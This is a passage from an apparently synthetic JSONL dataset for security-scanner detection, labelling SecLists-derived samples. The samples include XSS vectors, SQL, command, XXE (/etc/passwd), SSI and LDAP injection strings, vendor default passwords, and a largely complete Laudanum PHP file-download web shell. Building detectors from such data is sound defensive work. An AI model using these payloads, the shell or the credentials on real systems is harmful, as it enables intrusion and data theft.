id=x></fieldset><input autofocus></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<fieldset onblur=alert(1) tabindex=1 id=x></fieldset><input autofocus>", "injection_type": "XSS"}}]} {"id": "seclists_02983", "source": "seclists", "source_license": "MIT", "text": "filename=2", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "2", "injection_type": "cmd"}}]} {"id": "seclists_02984", "source": "seclists", "source_license": "MIT", "text": "filename=/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00", "injection_type": "cmd"}}]} {"id": "seclists_02985", "source": "seclists", "source_license": "MIT", "text": "username=\u0018 or 1=1 --&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\u0018 or 1=1 --", "injection_type": "SQL"}}]} {"id": "seclists_02986", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=admin\") or \"1\"=\"1\"# HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin\") or \"1\"=\"1\"#", "injection_type": "SQL"}}]} {"id": "seclists_02987", "source": "seclists", "source_license": "MIT", "text": "POST /api/import HTTP/1.1\nContent-Type: application/xml\n\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE xxe [<!ENTITY foo \"aaaaaa\">]><root>&foo;</root>", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE xxe [<!ENTITY foo \"aaaaaa\">]><root>&foo;</root>", "injection_type": "XXE"}}]} {"id": "seclists_02988", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=highway\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "highway"}}]} {"id": "seclists_02989", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><div draggable=\"true\" contenteditable>drag me</div><frameset ondrop=alert(1) contenteditable>drop here</frameset></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<div draggable=\"true\" contenteditable>drag me</div><frameset ondrop=alert(1) contenteditable>drop here</frameset>", "injection_type": "XSS"}}]} {"id": "seclists_02990", "source": "seclists", "source_license": "MIT", "text": "filename=%22%7C%20%5B%209%20-ne%20%24%28echo%20XWWMIW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22%7C%20%5B%209%20-ne%20%24%28echo%20XWWMIW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23", "injection_type": "cmd"}}]} {"id": "seclists_02991", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><script src=\"data:&comma;alert(1)//</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<script src=\"data:&comma;alert(1)//", "injection_type": "XSS"}}]} {"id": "seclists_02992", "source": "seclists", "source_license": "MIT", "text": "filename=&#x00003c;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#x00003c;", "injection_type": "cmd"}}]} {"id": "seclists_02993", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><div draggable=\"true\" contenteditable>drag me</div><isindex ondrop=alert(1) contenteditable>drop here</isindex></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<div draggable=\"true\" contenteditable>drag me</div><isindex ondrop=alert(1) contenteditable>drop here</isindex>", "injection_type": "XSS"}}]} {"id": "seclists_02994", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<address onfocusout=alert(1) tabindex=1 id=x></address><input autofocus>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<address onfocusout=alert(1) tabindex=1 id=x></address><input autofocus>", "injection_type": "XSS"}}]} {"id": "seclists_02995", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %27%20echo%20KLCYYE$((89%2B0))$(echo%20KLCYYE)KLCYYE|", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27%20echo%20KLCYYE$((89%2B0))$(echo%20KLCYYE)KLCYYE|", "injection_type": "cmd"}}]} {"id": "seclists_02996", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = '' or ''='';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' or ''='", "injection_type": "SQL"}}]} {"id": "seclists_02997", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Tags: general, basic, obfuscated, evil tags</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, basic, obfuscated, evil tags", "injection_type": "XSS"}}]} {"id": "seclists_02998", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: '%26echo%20YBINSK$((62%2B49))$(echo%20YBINSK)YBINSK\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'%26echo%20YBINSK$((62%2B49))$(echo%20YBINSK)YBINSK\"", "injection_type": "cmd"}}]} {"id": "seclists_02999", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><tfoot draggable=\"true\" ondrag=\"alert(1)\">test</tfoot></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<tfoot draggable=\"true\" ondrag=\"alert(1)\">test</tfoot>", "injection_type": "XSS"}}]} {"id": "seclists_03000", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: <<script>alert(\"XSS\");//<</script>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<<script>alert(\"XSS\");//<</script>", "injection_type": "cmd"}}]} {"id": "seclists_03001", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: \"%3Becho%20OFKRSW$((4%2B25))$(echo%20OFKRSW)OFKRSW\\", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"%3Becho%20OFKRSW$((4%2B25))$(echo%20OFKRSW)OFKRSW\\", "injection_type": "cmd"}}]} {"id": "seclists_03002", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:pretty@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "pretty"}}]} {"id": "seclists_03003", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<body onscroll=alert(1)><br><br><br><br>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<body onscroll=alert(1)><br><br><br><br>", "injection_type": "XSS"}}]} {"id": "seclists_03004", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:HP,<N/A>,<BLANK>,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "HP,<N/A>,<BLANK>,"}}]} {"id": "seclists_03005", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=tetsuo\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "tetsuo"}}]} {"id": "seclists_03006", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<mark id=x tabindex=1 onbeforeactivate=alert(1)></mark>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<mark id=x tabindex=1 onbeforeactivate=alert(1)></mark>", "injection_type": "XSS"}}]} {"id": "seclists_03007", "source": "seclists", "source_license": "MIT", "text": "filename=%2527%7C%20%5B%208%20-ne%20%24%28echo%20YGEOKN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2527%7C%20%5B%208%20-ne%20%24%28echo%20YGEOKN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20", "injection_type": "cmd"}}]} {"id": "seclists_03008", "source": "seclists", "source_license": "MIT", "text": "username=or 'unusual' = 'unusual'&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or 'unusual' = 'unusual'", "injection_type": "SQL"}}]} {"id": "seclists_03009", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Tags: general, html breaking, injection</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, html breaking, injection", "injection_type": "XSS"}}]} {"id": "seclists_03010", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<form><input formaction=javascript:alert(1) type=submit value=click>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<form><input formaction=javascript:alert(1) type=submit value=click>", "injection_type": "XSS"}}]} {"id": "seclists_03011", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"date_gmt\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"date_gmt\" -->", "injection_type": "SSI"}}]} {"id": "seclists_03012", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=pipe\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "pipe"}}]} {"id": "seclists_03013", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<base id=x tabindex=1 onfocusin=alert(1)></base>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<base id=x tabindex=1 onfocusin=alert(1)></base>", "injection_type": "XSS"}}]} {"id": "seclists_03014", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:IBM,DEMO1,<BLANK>,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "IBM,DEMO1,<BLANK>,"}}]} {"id": "seclists_03015", "source": "seclists", "source_license": "MIT", "text": "filename=%2527%0A%20str%3D%24%28echo%20KQSZPY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2527%0A%20str%3D%24%28echo%20KQSZPY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23", "injection_type": "cmd"}}]} {"id": "seclists_03016", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=/.../.../.../.../.../ HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "/.../.../.../.../.../", "injection_type": "cmd"}}]} {"id": "seclists_03017", "source": "seclists", "source_license": "MIT", "text": "<?php\n/* *****************************************************************************\n***\n*** Laudanum Project\n*** A Collection of Injectable Files used during a Penetration Test\n***\n*** More information is available at:\n*** http://laudanum.secureideas.net\n*** laudanum@secureideas.net\n***\n*** Project Leads:\n*** Kevin Johnson <kjohnson@secureideas.net\n*** Tim Medin <tim@counterhack.com>\n***\n*** Copyright 2014 by Kevin Johnson and the Laudanum Team\n***\n********************************************************************************\n***\n*** This file allows browsing of the file system.\n*** Written by Tim Medin <tim@counterhack.com>\n*** 2013-12-28 Updated by Jason Gillam - fixed parent folder\n***\n********************************************************************************\n*** This program is free software; you can redistribute it and/or\n*** modify it under the terms of the GNU General Public License\n*** as published by the Free Software Foundation; either version 2\n*** of the License, or (at your option) any later version.\n***\n*** This program is distributed in the hope that it will be useful,\n*** but WITHOUT ANY WARRANTY; without even the implied warranty of\n*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n*** GNU General Public License for more details.\n***\n*** You can get a copy of the GNU General Public License from this\n*** address: http://www.gnu.org/copyleft/gpl.html#SEC1\n*** You can also write to the Free Software Foundation, Inc., 59 Temple\n*** Place - Suite 330, Boston, MA 02111-1307, USA.\n***\n***************************************************************************** */\n\n// ***************** Config entries below ***********************\n\n// IPs are enterable as individual addresses TODO: add CIDR support\n$allowedIPs = array(\"192.168.1.1\",\"127.0.0.1\");\n\n# *********** No editable content below this line **************\n\n$allowed = 0;\nforeach ($allowedIPs as $IP) {\n if ($_SERVER[\"REMOTE_ADDR\"] == $IP)\n $allowed = 1;\n}\n\nif ($allowed == 0) {\n header(\"HTTP/1.0 404 Not Found\");\n die();\n}\n\n\n\n/* This error handler will turn all notices, warnings, and errors into fatal\n * errors, unless they have been suppressed with the @-operator. */\nfunction error_handler($errno, $errstr, $errfile, $errline, $errcontext) {\n /* The @-opertor (used with chdir() below) temporarely makes\n * error_reporting() return zero, and we don't want to die in that case.\n * We do note the error in the output, though. */\n if (error_reporting() == 0) {\n $_SESSION['output'] .= $errstr . \"\\n\";\n } else {\n die('<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\n \"http://www.w3.org/TR/html4/strict.dtd\">\n<html>\n<head>\n <title>Laudanum PHP File Browser</title>\n</head>\n<body>\n <h1>Fatal Error!</h1>\n <p><b>' . $errstr . '</b></p>\n <p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>\n\n <hr>\n <address>\n Copyright &copy; 2014, <a href=\"mailto:laudanum@secureideas.net\">Kevin Johnson</a> and the Laudanum team.<br/>\n Written by Tim Medin.<br/>\n Get the latest version at <a href=\"http://laudanum.secureideas.net\">laudanum.secureideas.net</a>.\n </address>\n\n</body>\n</html>');\n }\n}\n\nset_error_handler('error_handler');\n\n\n/* Initialize some variables we need again and again. */\n$dir = isset($_GET[\"dir\"]) ? $_GET[\"dir\"] : \".\";\n$file = isset($_GET[\"file\"]) ? $_GET[\"file\"] : \"\";\n\nif ($file != \"\") {\n if(file_exists($file)) {\n\n $s = split(\"/\", $file);\n $filename = $s[count($s) - 1];\n header(\"Content-type: application/x-download\");\n header(\"Content-Length: \".filesize($file)); \n header(\"Content-Disposition: attachment; filename=\\\"\".$filename.\"\\\"\");\n readfile($file);\n die();\n }\n}\n?>\n<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\n \"http://www.w3.org/TR/html4/strict.dtd\">\n<html>\n<head>\n <title>Laudanum File Browser</title>\n <link rel=\"stylesheet\" href=\"style.css\" type=\"text/css\">\n\n <script type=\"text/javascript\">\n </script>\n</head>\n<body onload=", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "php", "filename": "file.php"}}]} {"id": "seclists_03018", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<video><source onerror=alert(1) src=1></video>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<video><source onerror=alert(1) src=1></video>", "injection_type": "XSS"}}]} {"id": "seclists_03019", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"page_count\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"page_count\" -->", "injection_type": "SSI"}}]} {"id": "seclists_03020", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:saturday@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "saturday"}}]} {"id": "seclists_03021", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = '(';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "(", "injection_type": "SQL"}}]} {"id": "seclists_03022", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = <username>'--", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<username>'--", "injection_type": "SQL"}}]} {"id": "seclists_03023", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><tbody onpaste=\"alert(1)\" contenteditable>test</tbody></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<tbody onpaste=\"alert(1)\" contenteditable>test</tbody>", "injection_type": "XSS"}}]} {"id": "seclists_03024", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %26%20sleep%200%20%26%26%20str%3D%24%28echo%20VDSMTK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VDSMTK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527", "injection_type": "cmd"}}]} {"id": "seclists_03025", "source": "seclists", "source_license": "MIT", "text": "<?xml version=\"1.0\"?>\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]>", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]>", "injection_type": "XXE"}}]} {"id": "seclists_03026", "source": "seclists", "source_license": "MIT", "text": "password: Netopia,factory,(see note),http://packetstormsecurity.org/files/91948/Netopia-Routers-Factory-Password-Generator.html\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Netopia,factory,(see note),http://packetstormsecurity.org/files/91948/Netopia-Routers-Factory-Password-Generator.html"}}]} {"id": "seclists_03027", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">URL breaker for double quotes</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "URL breaker for double quotes", "injection_type": "XSS"}}]} {"id": "seclists_03028", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit String: <SCRIPT a=\"blah\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <SCRIPT a=\"blah\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "injection_type": "XSS"}}]} {"id": "seclists_03029", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"server_protocol\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"server_protocol\" -->", "injection_type": "SSI"}}]} {"id": "seclists_03030", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><div draggable=\"true\" contenteditable>drag me</div><data ondragover=alert(1) contenteditable>drop here</data></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<div draggable=\"true\" contenteditable>drag me</div><data ondragover=alert(1) contenteditable>drop here</data>", "injection_type": "XSS"}}]} {"id": "seclists_03031", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:allen@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "allen"}}]} {"id": "seclists_03032", "source": "seclists", "source_license": "MIT", "text": "filename=&#x003c;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#x003c;", "injection_type": "cmd"}}]} {"id": "seclists_03033", "source": "seclists", "source_license": "MIT", "text": "username='OR 1=1--&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'OR 1=1--", "injection_type": "SQL"}}]} {"id": "seclists_03034", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<svg><li onload=alert(1)></li>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<svg><li onload=alert(1)></li>", "injection_type": "XSS"}}]} {"id": "seclists_03035", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Description: This vector breaks JS integer assignments.</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: This vector breaks JS integer assignments.", "injection_type": "XSS"}}]} {"id": "seclists_03036", "source": "seclists", "source_license": "MIT", "text": "{% block content %}\n<h1>Hello .locale_object</h1>\n{% endblock %}", "findings": [{"category": "malicious", "subcategory": "malicious.ssti", "severity": "critical", "compliance": [], "fields": {"payload": ".locale_object", "injection_type": "SSTI"}}]} {"id": "seclists_03037", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Author Name: ha.ckers.org</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: ha.ckers.org", "injection_type": "XSS"}}]} {"id": "seclists_03038", "source": "seclists", "source_license": "MIT", "text": "username=||UTL_HTTP.REQUEST&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "||UTL_HTTP.REQUEST", "injection_type": "SQL"}}]} {"id": "seclists_03039", "source": "seclists", "source_license": "MIT", "text": "filename=\\'", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\'", "injection_type": "cmd"}}]} {"id": "seclists_03040", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>JavaScript Link Location</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "JavaScript Link Location", "injection_type": "XSS"}}]} {"id": "seclists_03041", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Author Name: .mario\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: .mario", "injection_type": "XSS"}}]} {"id": "seclists_03042", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:joan", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "joan"}}]} {"id": "seclists_03043", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<html ontouchcancel=alert(1)> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<html ontouchcancel=alert(1)>", "injection_type": "XSS"}}]} {"id": "seclists_03044", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=%26 HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26", "injection_type": "SQL"}}]} {"id": "seclists_03045", "source": "seclists", "source_license": "MIT", "text": "GET /api/user?filter=*(|(mail=*)) HTTP/1.1", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "*(|(mail=*))", "injection_type": "LDAP"}}]} {"id": "seclists_03046", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: *|", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "*|", "injection_type": "cmd"}}]} {"id": "seclists_03047", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=Cisco, UNITY_,<BLANK>,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Cisco, UNITY_,<BLANK>,"}}]} {"id": "seclists_03048", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf ;echo%20MPCSBG$((54%2B42))$(echo%20MPCSBG)MPCSBG", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ";echo%20MPCSBG$((54%2B42))$(echo%20MPCSBG)MPCSBG", "injection_type": "cmd"}}]} {"id": "seclists_03049", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf echo%20BKRXCQ$((95%2B40))$(echo%20BKRXCQ)BKRXCQ%26", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "echo%20BKRXCQ$((95%2B40))$(echo%20BKRXCQ)BKRXCQ%26", "injection_type": "cmd"}}]} {"id": "seclists_03050", "source": "seclists", "source_license": "MIT", "text": "filename=%22%26echo$IFSRHEKFG$((34%2B24))$(echo$IFSRHEKFG)RHEKFG\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22%26echo$IFSRHEKFG$((34%2B24))$(echo$IFSRHEKFG)RHEKFG\"", "injection_type": "cmd"}}]} {"id": "seclists_03051", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf '%3Becho$IFSGKNHWZ$((67%2B92))$(echo$IFSGKNHWZ)GKNHWZ%22", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'%3Becho$IFSGKNHWZ$((67%2B92))$(echo$IFSGKNHWZ)GKNHWZ%22", "injection_type": "cmd"}}]} {"id": "seclists_03052", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit String: ___=1?'ert(123)':0,_=1?'al':0,__=1?'ev':0,1[__+_](_+___) HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: ___=1?'ert(123)':0,_=1?'al':0,__=1?'ev':0,1[__+_](_+___)", "injection_type": "XSS"}}]} {"id": "seclists_03053", "source": "seclists", "source_license": "MIT", "text": "filename=%26%26echo$IFSMLKYIC$((73%2B57))$(echo$IFSMLKYIC)MLKYIC//", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%26echo$IFSMLKYIC$((73%2B57))$(echo$IFSMLKYIC)MLKYIC//", "injection_type": "cmd"}}]} {"id": "seclists_03054", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><caption draggable=\"true\" ondragenter=\"alert(1)\">test</caption></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<caption draggable=\"true\" ondragenter=\"alert(1)\">test</caption>", "injection_type": "XSS"}}]} {"id": "seclists_03055", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Name: Basic single quoted attribute breaker\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Basic single quoted attribute breaker", "injection_type": "XSS"}}]} {"id": "seclists_03056", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit String: <A HREF=\"//www.google.com/\">XSS</A>\" name=\"search\">", "findings": 